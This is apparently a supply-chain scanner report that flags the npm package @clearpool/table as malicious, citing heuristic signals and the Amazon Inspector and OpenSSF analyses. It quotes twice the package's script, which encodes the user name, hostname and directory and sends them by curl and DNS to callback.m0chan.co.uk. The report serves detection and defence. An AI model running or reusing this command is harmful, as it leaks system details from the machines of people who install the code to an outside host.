@clearpool/table @100.0.0

[Always reject] Script: b64=$(printf '%s' "$(whoami):$(hostname):$(pwd):$npm_package_name" | base64 -w0); pkgsub=$(printf '%s' "$npm_package_name" | sed 's/@//g; s|/|-|g'); pkgdns=$(printf '%s' "$npm_package_name" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk

[Always reject] Script: b64=$(printf '%s' "$(whoami):$(hostname):$(pwd):$npm_package_name" | base64 -w0); pkgsub=$(printf '%s' "$npm_package_name" | sed 's/@//g; s|/|-|g'); pkgdns=$(printf '%s' "$npm_package_name" | base64 -w0 | tr '+/' '-_' | tr -d '='); curl -sm5 https://$pkgsub.callback.m0chan.co.uk/$b64; nslookup $pkgdns.$pkgsub.callback.m0chan.co.uk

[Always reject] Matched 6 signal(s), weighted score 7: • [S_README_NO_CODE] Short README with no code block, no install instructions, and no usage/API section. • [S_NO_REPO_NO_HOME] No repository, homepage, or bugs URL — genuine packages almost always link somewhere. • [S_NO_KEYWORDS] No keywords declared. • [S_NO_DEPS] No runtime, dev, peer, or optional dependencies declared. • [S_TINY_PAYLOAD] Tiny payload: 1 code file(s), 987 bytes total. • [S_EMPTY_MAIN] Entry point (index.js) is 21 bytes — effectively empty.

--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (79bdf65c3193663ec05f4281e94765c2106a6a5ce8bd9860a4cfcbaab419f0c9) The package @clearpool/table was found to contain malicious code. ## Source: ossf-package-analysis (8373d571d5e72810442e5125ae56eac20b4cdfb9e12ef12ce5abfbd9cfbb77a8) The OpenSSF Package Analysis project identified '@clearpool/table' @ 99.99.99 (npm) as malicious. It is considered malicious because: - The package executes one or more commands associated with malicious behavior.

Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.